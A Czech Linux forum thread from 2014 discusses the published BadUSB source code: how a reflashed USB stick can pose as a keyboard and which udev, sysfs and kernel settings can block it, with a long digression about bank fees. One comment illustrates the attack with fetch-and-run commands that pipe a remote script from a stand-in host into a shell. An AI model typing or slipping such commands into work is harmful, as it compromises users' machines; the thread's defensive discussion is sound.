abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
dnes 02:22 | Zajímavý projekt

Lze si počítačovou klávesnici navrhnout a následně vytisknout na 3D tiskárně? I spínače? James Stanley se rozhodl, že to zkusí a výsledky svého snažení zveřejňuje na svém blogu. V aktuálním příspěvku představil první funkční prototyp s třemi klávesami. Ne, nejsou to Ctrl-Alt-Delete. :-)

Ladislav Hagara | Komentářů: 0
dnes 01:11 | Nová verze

Byla vydána nová verze 1.47 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a animovanými gify v poznámkách k vydání. Ve verzi 1.47 bude vydáno také VSCodium, tj. komunitní sestavení Visual Studia Code bez telemetrie a licenčních podmínek Microsoftu.

Ladislav Hagara | Komentářů: 0
včera 13:33 | Komunita

Služba Firefox Send (zprávička) pro jednoduché a soukromé sdílení souborů s end-to-end šifrováním je dočasně pozastavena. Byla zneužívaná k šíření malwaru [reddit].

Ladislav Hagara | Komentářů: 10
včera 05:55 | Komunita

Google a Canonical společně oznámili možnost běhu aplikací postavených na Flutteru (Wikipedie) také na Linuxu. Na Linuxu lze tyto grafické aplikace také přímo vyvíjet. Současně byla představena pomocí Flutteru vytvořená aplikace pro správu kontaktů Flokk. Ukázka aplikace běžící na Ubuntu na YouTube. Flutter SDK i Flokk jsou již k dispozici také jako Snap balíčky na Snapcraftu.

Ladislav Hagara | Komentářů: 8
včera 02:22 | Komunita

Google na svém blogu věnovanému open source představil novou organizaci Open Usage Commons. Cílem této organizace je rozšířit filozofii a definici open source také na ochranné známky projektů. První tři zapojené projekty jsou Angular, Gerrit a Istio. Více v často kladených otázkách (FAQ).

Ladislav Hagara | Komentářů: 0
včera 01:11 | Nová verze

Společnost NVIDIA oficiálně vydala verzi 11.0 toolkitu CUDA (Wikipedie) umožňujícího vývoj aplikací běžících na jejich grafických kartách. Přehled novinek v poznámkách k vydání.

Ladislav Hagara | Komentářů: 0
8.7. 17:44 | Nová verze

Byla vydána verze 6 vizuálního programovacího jazyka Snap! (Wikipedie) inspirovaného jazykem Scratch (Wikipedie). Přehled novinek a diskuse v diskusním fóru. Poznámky k vydání na GitHubu. Videoukázky na YouTube.

Ladislav Hagara | Komentářů: 1
8.7. 17:33 | Komunita

MojeFedora.cz informuje, že souborový systém Btrfs míří do desktopové Fedory. Návrh na změnu výchozího souborového systému z Ext4 na Btrfs včera schválilo FESCo a vrátilo ho k finálnímu schválení pracovní skupině kolem edice Workstation. Tam se zamítnutí nepředpokládá, takže se nyní řeší ne jestli, ale kdy ke změně dojde.

Ladislav Hagara | Komentářů: 20
8.7. 15:55 | IT novinky

Společnost SUSE kupuje společnost Rancher Labs. Společnost Rancher Labs je známá mimo jiné svou platformou Rancher pro řízení Kubernetes.

Ladislav Hagara | Komentářů: 13
8.7. 15:11 | Nová verze

Byla vydána verze 2.6.0 svobodného multiplatformního správce hesel KeePassXC (Wikipedie). Jedná se o komunitní fork správce hesel KeePassX s řadou vylepšení.

Ladislav Hagara | Komentářů: 10
Používáte některé open-source řešení [protokol] pro šifrovaný instant messaging?
 (22%)
 (30%)
 (4%)
 (12%)
 (17%)
 (6%)
 (13%)
 (25%)
Celkem 322 hlasů
 Komentářů: 35, poslední včera 02:05
Rozcestník
Štítky: není přiřazen žádný štítek


Vložit další komentář
Bedňa avatar 5.10.2014 13:05 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Pizdy Mrkvosofťácke to postavia na NET a MS Visual Studio, WTF?
KERNEL ULTRAS video channel >>>
Jardík avatar 5.10.2014 13:10 Jardík | skóre: 40 | blog: jarda_bloguje
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Může někdo lépe popsat o co jde? Jak útok probíhá, jestli je to jen záležitost Windows, ... něco jsem letmo četl, ale nechce se mi studovat nějaké dlouhé materiály a shlížet přednášky.
Věřím v jednoho Boha.
Jendа avatar 5.10.2014 13:22 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
(přednášku jsem neviděl)
Jak útok probíhá
Do řadiče USB flashdisku je nahrán alternativní firmware, který občas po připojení emuluje klávesnici, která namačká buď Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter, nebo Alt+F2, curl http://nsa.gov/client.sh|sh, Enter, nebo obecný shell payload.
jestli je to jen záležitost Windows
Je to záležitostí všech sračkových operačních systémů, které po připojení USB klávesnice z této automaticky začnou číst klávesy. Tedy i Linuxu, pokud si ho nějak extra nepatchneš. Proti necílenému útoku by mohlo pomoci mít nestandardní klávesové zkratky a doufat, že se to nespustí zrovna když jsi v terminálu.
5.10.2014 13:35 odin
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Je to záležitostí všech sračkových operačních systémů, které po připojení USB klávesnice z této automaticky začnou číst klávesy.

Vite, normalni clovek (ne uhrovity geek chodici do hackerspacu) ale ocekava, ze bude moci na klavesnici psat hned po pripojeni. Jak byste chtel toto resit? To by si mel uzivatel pro tu klavesnici manualne nahrat nejaky modul? Nebo by mel resit otisky a digitalni podpisy firmwaru zarizeni? To by byl opet dalsi uspesny krok k prosazeni GNU/Linuxu na desktopu. rofl
Hans1024 avatar 5.10.2014 13:37 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ono by stacilo treba vyskakovaci okenko "Uzivateli, pripojil jsi klavesnici?"
Veni, vidi, copi
5.10.2014 13:46 odin
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
No jo, ale jak byste resil podporu napric desktopovymi prostredimi? Jak byste to resil v terminalu? A co kdyz uzivatel nebude mit pripojenou mys a ani jine zarizeni? Od klavesnice proste cekam, ze bude psat hned po pripojeni. Uz vidim ty posmesne reakce windowsaku na to, kdyz by se GNU/Linux po pripojeni klavesnice ptal, jestli jsem opravdu pripojil klavesnici. Uzivatel by nepochopil, ze se jedna o bezpecnostni vec, jen by si rekl, jak je ten Linux hloupy.
Hans1024 avatar 5.10.2014 13:55 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Kdyby to byla prvni pripojena klavesnice, tak by se dotazovat nemuselo.

Uzivatele at se klidne smejou, ja se zase budu smat az jim nekdo vykrade bankovni ucet.
Veni, vidi, copi
5.10.2014 17:36 M
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
jo, to by mi přišlo jako celkem rozumný způsob, první připojená klávesnice bez dotazu a při druhé a další dotaz požadovat potvrzení, jestli to myslím vážně
5.10.2014 18:00 chrono
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Také niečo by musel podporovať aj BIOS.
6.10.2014 09:02 ByCzech
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A jak zjistíte, která klávesnice je "první" a "ta správná" při zapínání počítače? Uživatel je schopen do USB narvat cokoli i při vypnutém počítači a zapnout až následně ;-) Napadá mě jedině, že se od klávesnice po její autorizaci uloží někam i její identifikační údaje - nejsou údaje = nepracuje...
6.10.2014 09:43 R
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Vacsina klavesnic nema ziadne unikatne identifikacne udaje. Ked mas dve, jednu odpojis a druhu pripojis, tak OS nema ako zistit, ze je to druhy kus rovnakej klavesnice. Takze utocnik jednoducho pouzije v zariadeni USB deskriptor nejakej casto pouzivanej klavesnice...
6.10.2014 19:03 petr_p | skóre: 59 | blog: pb
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
USB má topologii. Nevím, co je to většina klávesnic, ale moje má vyplněný údaj iSerial. A navíc pokud vám systém začne tvrdit, že připojujete druhou klávesnici, ale vy vidíte jen jednu, tak opatření úkol splnilo. Ne?
7.10.2014 21:41 Ondrej Santiago Zajicek
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
jo, to by mi přišlo jako celkem rozumný způsob, první připojená klávesnice bez dotazu a při druhé a další dotaz požadovat potvrzení,
To je dobre reseni az do okamziku, kdy se vam jedna klavesnice rozbije, budete chtit pripojit nahradni a ta rozbita je pevne integrovana (jako napr. u notebooku).
20.4.2017 22:28 boriz | skóre: 4 | Localhost
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Slysel pan soudruh o mysi? :D pripadne HW jumper na "override" pri poruse u systemu bez GUI
I slackwaristi maji sve dny
6.10.2014 01:00 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
AFAIK banka v takovém případě peníze vrací, takže když někomu vykradou účet, zaplatíte to taky (v ceně služeb)
Quando omni flunkus moritati
Bystroushaak avatar 6.10.2014 10:37 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
V ceně služeb, když je více/méně všechno zadarmo?
Jendа avatar 6.10.2014 11:34 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ty dostáváš plný výtěžek z investic, když banka tvé peníze někam strčí? Já bohužel v bance dostávám jen směšný úrok (70 ppm).
Bystroushaak avatar 6.10.2014 13:25 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Já dostávám nějaké drobné, to ale nic nemění na to, že jsou ty služby (vedení účtu, příchozí/odchozí transakce, internetbanking, výpis účtu a tak) zadarmo, tedy že za ně neplatím. Neříkám, že z toho banka nic nemá, ale zároveň mi taky nic nebere. Je to imho taková ideální symbióza.
6.10.2014 16:06 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
zároveň mi taky nic nebere
Neklesá vám číslo "peněz na účtu celkem". To "nebere" je sporné - jestli banka díky těm penězům něco vydělává (což vydělává a nebude to málo), tak by vám z toho mělo něco kápnout, ne? Třeba aspoň dorovnání inflace.
Quando omni flunkus moritati
Bystroushaak avatar 6.10.2014 17:27 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Neklesá vám číslo "peněz na účtu celkem". To "nebere" je sporné - jestli banka díky těm penězům něco vydělává (což vydělává a nebude to málo), tak by vám z toho mělo něco kápnout, ne? Třeba aspoň dorovnání inflace.
Viz ta první věta;
Já dostávám nějaké drobné
To je něco jako softwarové pirátství - pro mě je to co s těma penězma banka dělá naprosto virtuální a v podstatě se mě to vůbec netýká. Spokojím se s tím, že mi poskytuje služby, které od ní očekávám, že je pojištěná a že jsou tam obecně peníze bezpečnější, než u mě doma pod postelí.

Samozřejmě, je hezké, když mi jednou měsíčně přičtou dvacet halířů, ale v podstatě mě to ani nezajímá. V objemech toků peněz, které každý den utrácím a které dostávám od zaměstnavatele je to v podstatě neviditelná částka.
6.10.2014 17:52 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Spokojím se s tím, že mi poskytuje služby, které od ní očekávám, že je pojištěná a že jsou tam obecně peníze bezpečnější, než u mě doma pod postelí.

Je fajn, že se spokojíte, ale to nic nemění na tom, že služby nedostáváte zadarmo. Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal, a penězmi, které jste za to dostal (těch pár halířů). Že ten rozdíl nikdy nevidíte jako částku na výpisu z účtu, na věci taky nic nemění.

Banka má samozřejmě nějaké náklady, takže vám nikdy nemůže dát všechno, co váš vklad vydělal. No a mezi ty náklady se počítají i peníze, o které banka přijde kvůli viz #48
Quando omni flunkus moritati
6.10.2014 18:06 odin
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Kdyz si pujcite penize, ktere nasledne investujete, a ty vam vygeneruji nejaky zisk, davate snad nasledne cast tohoto zisku bance? Ne, nedavate. Davate ji urok bez ohledu na to, co s pujcenymi penezi udelate. To same jsou klientovy penize na bankovnim uctu! Pokud neplati zadne poplatky za vedeni uctu a souvisejici sluzby, tak ma bankovni sluzby zadarmo. Ta vase bolsevicka argumentace, ze by mela banka ze svych zisku neco odevzdavat, neobstoji. Klient sveruje sve penize bance ze sve svobodne vule a na zaklade smlouvy, kterou podepise. Tim to konci! Pokud se nekdo nechce nechat vykoristovat, nemusi techto sluzeb vyuzivat.
pavlix avatar 6.10.2014 18:43 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Pokud se nekdo nechce nechat vykoristovat, nemusi techto sluzeb vyuzivat.
A může zcela svobodně bydlet v jeskyni... oh wait, ani to nemůže.
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
Bystroushaak avatar 6.10.2014 19:58 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ehm. O jakém vykořisťování tu mluvíme? Nějak jsem ztratil kontext.
pavlix avatar 6.10.2014 21:36 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Asi jsem citoval zbytečně moc, stačilo jen to, že nemusí využívat služeb banky.
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
6.10.2014 19:29 Ondrej Santiago Zajicek
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal,
To je ale krajne uhozena argumentace. Vychazi z implicitniho predpokladu, ze onen zisk je prirozeny a automaticky dusledek toho vkladu a banka ho jen shrabne 'bez namahy'.

Ve skutecnosti banka k zisku potrebuje minimalne ctyri veci:

1) kapital - ten primarne poskytuji investori

2) likviditu - tu primarne poskytuji vkladatele

3) investicni prilezitosti

4) infrastrukturu a know-how

Samotne penize od vkladatelu zadny vynos neudelaji. A protoze v soucasne situaci maji banky obecne likvidity nadbytek (relativne k ostatnim faktorum), tak jeji mezni uzitecnost je mala a banky tedy nepotrebuji lakat dalsi vkladatele velkymi vynosy.

Pokud ma smysl nejake jine meritko ceny, tak je to cena uslych prilezitosti. Tedy vynos, ktery by si ty sam s tema penezma mohl udelat, kdybys je nevlozil do banky. Jenze to je ve vetsine pripadu nominalni nula.
7.10.2014 01:51 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To je ale krajne uhozena argumentace. Vychazi z implicitniho predpokladu, ze onen zisk je prirozeny a automaticky dusledek toho vkladu a banka ho jen shrabne 'bez namahy'.

Ten předpoklad jste si nicméně do mého příspěvku doplnil vy (a to, že je implicitní, je váš názor.) Já nic takového netvrdil

Quando omni flunkus moritati
7.10.2014 11:01 Ondrej Santiago Zajicek
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ten predpoklad vychazi z pouziti vyrazu 'váš vklad do banky té bance vydělal'. Pokud vklad sam nic nevydela, ale je jen jeden z nekolika faktoru, ktere banka potrebuje pro dosazeni vynosu, pak ten vyraz pozbyva smyslu. Resp. bychom museli resit relativni prinos jednotlivych faktoru pro dosazeni vynosu, coz by zase souviselo s meznim uzitkem jednotlivych faktoru a ten je u vkladu v soucasnosti nizky (a proto jsou nizke uroky na beznych vkladech).
7.10.2014 09:18 ebik | skóre: 2
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal, a penězmi, které jste za to dostal (těch pár halířů).
Zapoměl jste odečíst cenu práce. Ano, ono to stojí (nejen) něco lidských zdrojů, aby ten vklad do banky něco vydělal. A jen pro srovnání si představte, kolik lidských zdrojů by to stálo, kdybyste si to aby vaše vklady vydělávaly řešit sám. Takže si to shrneme: banka nabízí produkt, investuje do něj něj nějakou práci a má z toho nějaký zisk. Na vás je, jestli ten produkt je pro vás výhodný, bez ohledu na to, kolik ta banka z toho má. Pokud se najde dost lidí, kteří přejdou k bance která více svého zisku vrací a pokud to bude stále finančně výhodné pro tu banku (bude mít víc klientů), tak taková banka vznikne. To jsou pravidla trhu.

Vezměme si jiný příklad. Pokud budou stejnou trasou jezdit dva dopravci. Jeden bude mít jízdné 100 Kč a při tom marží 1Kč. Druhý bude mít jízdné 50Kč a marži 40Kč (podaří se mu získat nějakou dotaci od státu, nebo tak něco). Kterého si vyberete? Toho s nižší marží?
Jendа avatar 7.10.2014 09:46 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Zapoměl jste odečíst cenu práce.
Ta podle mě nebyla zahrnuta v tom které váš vklad do banky té bance vydělal, tj. mluvil o čistém zisku.

Zbytek příspěvku mi přijde, že vůbec nereaguje na trekkera. Můžeš to zkusit upřesnit?
Pokud se najde dost lidí, kteří přejdou k bance která více svého zisku vrací a pokud to bude stále finančně výhodné pro tu banku (bude mít víc klientů), tak taková banka vznikne.
Pokud jí v tom nebrání zákon - např. kdyby existoval zákon, který by nařizoval bance ukradené peníze hradit. Existuje? Nějaké rozsudky v tom smyslu tu už myslím byly.
7.10.2014 12:35 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Zapoměl jste odečíst cenu práce.
Nezapomněl. Výdělek z vkladu zákazníka je pro banku příjem, do kterého se cena práce nazapočítává. Ta (a ostatní náklady) se počítá až do zisku, o kterém jsem ale nemluvil.

Quando omni flunkus moritati
5.10.2014 14:02 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Jinými slovy, ty jsi proti bezpečnostímu mechanismu v Linux z toho důvodu, že by se tomu nějací windowsáci mohli smát?

Jinak praktických řešení je určitě dost, aniž by to nějak výrazně ohrozilo uživatelskou přívětivost. Systém by se například nemusel ptát pokaždé na to samé zařízení, celý mechanismus by se mohl dát vypnout, atd., Jak se říká; Kdo chce, hledá způsoby, kdo nechce, hledá důvody a zbytečná ad hominem na Jednu...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 14:03 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ale no tak sakra, Jendu... Excuse my sexdaily...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 16:43 odin
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A co zbytecna ad hominem na GNU/Linux od Jendy? Ta jsou ok? Je mi jedno, ze by se mi windowsaci smali, ale nechci davat bfuckum dalsi prekazky k tomu, aby mohli pouzivat GNU/Linux na svem desktopu. Jakakoli rada, ktera bude znit jako zkontrolujte podpis (otisk), zavedte modul xy, pridejte pravidlo do udevu, atd..., je pro bfu bezcena a povede jen ke snizovani podilu GNU/Linuxu na desktopu. :-(
5.10.2014 17:34 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Tak jasně, že by to chtělo uživatelsky přívětivé rozhraní, ale než můžeš takový vytvořit, tak na to v systému potřebuješ prostředky, jako např. něco v tom udevu, žejo...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
Jendа avatar 5.10.2014 19:19 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
a zbytečná ad hominem na Jednu...
Mě hlavně překvapilo, že ví, že mám uhry. Nemám je totiž v obličeji…
Jendа avatar 5.10.2014 19:18 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A co kdyz uzivatel nebude mit pripojenou mys a ani jine zarizeni?
Zobrazí se: Pro aktivaci klávesnice na ní napište "bablbam". Malware na USB klíčence náhodné slovo z obrazovky nepřečte.
Uzivatel by nepochopil, ze se jedna o bezpecnostni vec, jen by si rekl, jak je ten Linux hloupy.
Nevadí mi používat (bezpečný) systém, i když si o něm BFU budou myslet, že je hloupý.
6.10.2014 09:41 R
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A zobrazi sa to kedy a kde? Pri kazdom boote systemu? Alebo si to bude pamatat, ktore klavesnice su povolene (podla coho - vacsina klavesnic nema v sebe seriove cislo)? A kde sa to bude zobrazovat - na konzole? V X11?
Jendа avatar 6.10.2014 11:31 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A zobrazi sa to kedy a kde? A kde sa to bude zobrazovat - na konzole? V X11?
Na konzoli, v Xkách… podle toho, kde uživatel bude.
Pri kazdom boote systemu? Alebo si to bude pamatat, ktore klavesnice su povolene (podla coho - vacsina klavesnic nema v sebe seriove cislo)?
USB ID může útočník fejkovat (pokud trefí stejného výrobce a model klávesnice), ale systém kromě toho vidí, do kterého portu, případně k jakému hubu je klávesnice připojena. Takže pokud uživatel nebude klávesnici přehazovat mezi USB porty, nemusí se to pokaždé ptát.
Bystroushaak avatar 6.10.2014 13:28 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
USB ID může útočník fejkovat (pokud trefí stejného výrobce a model klávesnice), ale systém kromě toho vidí, do kterého portu, případně k jakému hubu je klávesnice připojena. Takže pokud uživatel nebude klávesnici přehazovat mezi USB porty, nemusí se to pokaždé ptát.
Co si prostě rozdělit porty podle zařízení? Tzn vepředu na počítači mít porty třeba jen na mass storage a na nic jiného. Sice to nepomůže v případech ala "podvodná myš", ale vyřeší to půlku problému s podvodnými flashdisky, kterých bych se bál podstatně víc.
Jendа avatar 5.10.2014 19:16 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Vite, normalni clovek (ne uhrovity geek chodici do hackerspacu) ale ocekava, ze bude moci na klavesnici psat hned po pripojeni.
Nejde to prostě bezpečně udělat. Stejně, jako nejde třeba bezpečně automaticky spouštět binárky z webových stránek. Prostě tam bude stejné vyskakovací okno jako když ve windowsech klikneš na neznámé .exe - Are you sure? Yes, no.
pavlix avatar 5.10.2014 21:19 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Yes.
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
pavlix avatar 5.10.2014 21:20 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Plus... Don't show this dialog again.
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
Bedňa avatar 5.10.2014 21:56 Bedňa | skóre: 34 | blog: Žumpa | Horňany
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Samozrejme na Windejsi z oficiálnou podporou z uloz.to

Tam už asi nieje potrebné takéto veci riešiť, keď tam autor uploadu aj tak vložil backdoor. Môj odhad je že sa tam nachádza takéhoto softvéru 99% inak neviem prečo by ho tam niekto dával.

Mno a Skype a ďalšia háveď je kapitola sama o sebe. Keď sa pozrieš tu na screenshots tak je v každom druhom. Slobodné riešenia samozrejme neexistujú, ehh.
KERNEL ULTRAS video channel >>>
6.10.2014 18:03 ps2
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Třeba mít na tak zásadní zařízení jako klávesnice jiný konektor? :)

Obecně by to zamodřejmě chtělo rozdělit všechny periferie na důveryhodné (povětšinou stabilně připojené) a nedůveryhodné připojované občas a podle toho se chovat k nim chovat. Ovladač k projektoru ať se klidně tváří jako HID a prezentační aplikace na něj může bez problémů reagovat, ale terminál nebo systémový dialog by ho měl implicitně ignorovat i kdyby se tvářil jako klávesnice myš a teblet najednou.

Řešení pro bfu je mraky, třeba červený konektor kam se připojí klávesnice, nebo dialog "Právě jste připojili nové vstupní zařízení typu klávesnice, stlačte X DF" ..."vaše zařízení pracuje správně"
5.10.2014 13:45 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Tedy i Linuxu, pokud si ho nějak extra nepatchneš.
Nestačilo by pravidlo do udevu?
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 16:45 Kvakor
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To by nejspíš u vstupních zařízení nepomohlo, vstupní vrstva začne pracovat hned, jak ze zařízení nahozeno.

Nicméně by šlo dodělat dodatečnou vrstvu do jádra, která by ovládala, jaká ze vstupních zařízení jsou aktivní a jaká jsou neaktivní (tj. události od nich jsou nezpracované zahazovány) a právě to už by udev obsluhovat mohl, nejspíš přes nějaký soubor v /sys. Šlo by tím nejen zajistit ochranu proti potvorám jako BadUSB, ale například také "zamknutí" všech vstupních zařízení, například podle toho, jestli je nějaké zařízení přítomné nebo ne.

Pro grafická prostředí by pak stačilo poslat zprávu skrz DBus, kde by naslouchal program, co by se na neznámé vstupní zařízení zeptal uživatele, který by ho následně mohl povolit (a nechat zapsat do seznamu povolených), povololit dočasně nebo ignorovat.
5.10.2014 17:32 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To by nejspíš u vstupních zařízení nepomohlo, vstupní vrstva začne pracovat hned, jak ze zařízení nahozeno.
Viz tady - ten člověk sice řeší keymap, ale podobným způsobem by imho šlo zabránit takovým útokům...

Zásah do jádra mi přijde overkill, spíš ten udev a/nebo xinput vrstva...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 18:34 Kvakor
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To by mohlo fungovat - i když by zařízení dál posílalo události stisků kláves, tak pokud by namapovaly "do nikam", byl by efekt stejný jako zahození. On to vlastně je "zásah do jádra", ale přes mechanismus, který tam už je.

Ale i tak myslím, že možnost zcela odpojit vstupní zařízení už v jádře by se hodila, v otázce bezpečnsti je overkill často to nejlepší řešení :-)

5.10.2014 19:23 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To by mohlo fungovat - i když by zařízení dál posílalo události stisků kláves, tak pokud by namapovaly "do nikam", byl by efekt stejný jako zahození. On to vlastně je "zásah do jádra", ale přes mechanismus, který tam už je.
Přesně tak, IMHO už veškerá potřebná funkcionalita v jádře a v udevu je. IIRC nemusíš ani dělat hack s keymapem, mělo by jít usb zařízení odpojit zápisem vhodné hodnoty někam do /sys/bus/usb/, ačkoli teď hned z hlavy nevim, co konkrétně zapsat kam...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 20:03 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Tak abych jen nežvanil, tak jsem to našel ;-)

echo 1 > /sys/bus/usb/devices/$USB_PATH/remove

Tohle u mě funguje a dá se to s trochou RTFM nechat zavolat z udev pravidla. IIRC by také mělo být možné požádat udev po D-Busu, aby něco odpojil, to koneckonců DE běžně dělají. Tzn. jediné, co zbývá, je napsat pár vhodných pravidel a přívětivé rozhraní ;-)
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 22:18 Kvakor
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Tak jsem zjistil, že není třeba ani zařízení odpojovat, je tam totiž ještě jeden zajímavý soubor, kterým jde zařízení zakázat a následně zas povolit bez znovuzapojování. Když se zapíše nula do souboru /sys/bus/usb/device/.../authorized (viz dokumentace jádra, je to hned ze začátku), tak zařízení zakázáno a ovladače ho nemohou používat. Je to původně pro použití s bezdrátovými USB zařízenímy, ale funguje to i u normálních "drátových" (je myšleno na úrovni protokolu, myš s přijímačem v USB je z tohoto pohledu stále "drátová"). Tudíž by stačilo udev pravidlo, které by všechna HID zařízení po připojení zakázala a znovu je autorizovala až po ověření uživatelem.

Nebo - pro maximální paranoiky a/nebo ty s PS/2 zařízeními - patchnout jádro, aby byla všechna HID zařízení defaultně neautorizovaná a musela se povolit dodatečně.
5.10.2014 23:13 atalax | skóre: 2
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A rychlé nahlédnutí do zdrojáků, konkrétně drivers/usb/core/hcd.c ukáže, že jádno netřeba patchovat (teda pokud nevadí, že to vypne všechny USB zařízení a ne jen HID, což asi stejně není od věci).

/* authorized_default behaviour:
 * -1 is authorized for all devices except wireless (old behaviour)
 * 0 is unauthorized for all devices
 * 1 is authorized for all devices
 */
static int authorized_default = -1;
module_param(authorized_default, int, S_IRUGO|S_IWUSR);
MODULE_PARM_DESC(authorized_default,
		"Default USB device authorization: 0 is not authorized, 1 is "
		"authorized, -1 is authorized except for wireless USB (default, "
		"old behaviour");

